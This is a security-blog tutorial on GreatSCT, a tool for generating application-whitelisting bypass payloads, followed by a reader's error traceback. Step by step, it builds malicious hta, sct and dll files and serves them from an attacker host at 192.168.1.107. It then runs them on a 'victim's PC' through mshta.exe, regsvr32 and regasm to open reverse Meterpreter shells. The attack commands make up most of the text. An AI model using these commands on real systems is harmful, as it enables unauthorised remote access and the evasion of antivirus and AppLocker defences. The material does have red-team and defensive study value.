GreatSct – An Application Whitelist Bypass Tool
While writing Applocker bypass series, we found a new tool which was specially designed for bypassing whitelisting application. So I decided to write this article where we are introducing another most interesting tool “Great SCT –A Metasploit payload generator” tool which is similar to Unicorn or msfvenom because it depends on the Metasploit framework to provide reverse connection of the victim’s machine. So let’s began with its tutorial and check its functionality.
Table of Content
- GreatSCT
- Installation & Usages
- Generate malicious hta file
- Generate malicious sct file
- Generate malicious dll file
GreatSCT
GreatSCT is current under support by @ConsciousHacker, the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application whitelist bypasses. This tool is intended for BOTH red and blue team. It is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.
You can download it from here: //github.com/GreatSCT/GreatSCT
Installation & Usages
It must first be downloaded and installed in order to start using Great SCT. Run the following command to download Great SCT from github and also take care of its dependency tools while installing it.
This help to bypass Applocker policy by using the following tools:
- Installutil.exe : The Installer tool is a command- line tool that lets you install and uninstall server resources in specific assemblies by running the installer components.
- Msbuild.exe : The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild.
- Mshta.exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with.
- Regasm.exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently.
- Regsvcs.exe : RegSvcs stands for Microsoft .NET Remote Registry Services it is known for .NET Services Installation.
- Regsvr32.exe : Regsvr32 is a command line utility for register and unregister OLE controls in the Windows Registry, such as DLLs and ActiveX controls.
git clone https://github.com/GreatSCT/GreatSCT.git cd GreatSCT cd setup ./setup.sh
Once it’s downloaded, type the following command to access the help commands:
use Bypass
Now to get the list of payloads type :
list
Generate malicious hta file
Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :
use mshta/shellcode_inject/base64_migrate.py
Once the command is executed, type :
generate
After executing the generate command, it asks you which method you want to use. As we will use msfvenom type 1 to choose the first option. Then click enter for meterpreter. Then supply lhost and lport, i.e. 192.168.1.107, 4321 respectively.
When generating the shellcode, it will ask you to give a name for a payload. By default, it will take ‘payload’ as name. As I didn’t want to give any name, I simply pressed enter.
Now, it made two files. One resource file and other an hta file.
Now, firstly, start the python’s server in /usr/share/greatsct-output/source by typing:
python -m SimpleHTTPServer 80
Now execute the hta file in the command prompt of the victim’s PC.
mshta.exe //192.168.1.107/payload.hta
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And voila! You have your session.
Visit here “Bypass Application Whitelisting using mshta.exe (Multiple Methods)” to learn more about mshta.exe techniques.
Generate malicious sct file
Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :
use regsvr32/shellcode_inject/base64_migrate.py
Once the command is executed, type :
generate
Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the given port (any) as here you can see in the image below that we have given lport as 2345
After giving the details, it will ask you name for your malware. By default, it will set name ‘payload’ so either you can give the name or just press enter for the default settings.
And just as you press enter it will generate two files. One of them will a resource file and others will be .sct file. Now start the python’s server in /usr/share/greatsct-output/source by typing:
python -m SimpleHTTPServer 80
Now execute the .sct file in the run window of the victim’s PC as shown below
regsvr32.exe /s /u /n /i://192.168.1.107/payload.sct
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And voila! You have your session.
Visit here “Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)” to learn more about mshta.exe techniques.
Generate malicious dll file
Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will use :
use regasm/meterpreter/rev_tcp.py
Once the command is executed, type:
set lhost 192.168.1.107 generate
After giving the details, it will ask you a name for your malware. By default, it will set name ‘payload’ so either you can give the name or just press enter for the default settings.
And just as you press enter it will generate dll files.
Now start the python’s server in /usr/share/greatsct-output/compiled by typing:
python -m SimpleHTTPServer 80
Now place above generated dll file inside : C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\ and then execute the .dll file in the run window of the victim’s PC as shown below:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And voila! You have your session.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Hello, I am following your tutorial, but after typing out the address when I am supposed to generate the shellcode it gives this error.
/bin/sh: 1: /usr/share/metasploit-frameworkmsfvenom: not found
/tmp/hta_source.cs(28,8): warning CS0219: The variable `gTmWxbRnvDufua’ is assigned but its value is never used
/tmp/hta_source.cs(31,8): warning CS0219: The variable `bmjpLwXeVq’ is assigned but its value is never used
/tmp/hta_source.cs(37,10): warning CS0219: The variable `fNnDFQrSlZWNZCs’ is assigned but its value is never used
Compilation succeeded – 3 warning(s)
0009:err:mscoree:CLRRuntimeInfo_GetRuntimeHost Wine Mono is not installed
Traceback (most recent call last):
File “GreatSCT.py”, line 98, in
the_conductor.main_menu()
File “/root/GreatSCT/lib/common/orchestra.py”, line 130, in main_menu
tool_object.tool_main_menu()
File “Tools/Bypass/Tool.py”, line 381, in tool_main_menu
self.use_payload(selected_payload_module)
File “Tools/Bypass/Tool.py”, line 422, in use_payload
selected_payload.generate()
File “Tools/Bypass/payloads/mshta/shellcode_inject/base64_migrate.py”, line 273, in generate
with open(“/tmp/greatsct.js”, ‘r’) as original:
FileNotFoundError: [Errno 2] No such file or directory: ‘/tmp/greatsct.js’
I believe I did everything as you wrote, is there anything I need installed before being able to continue?
Thanks in advance.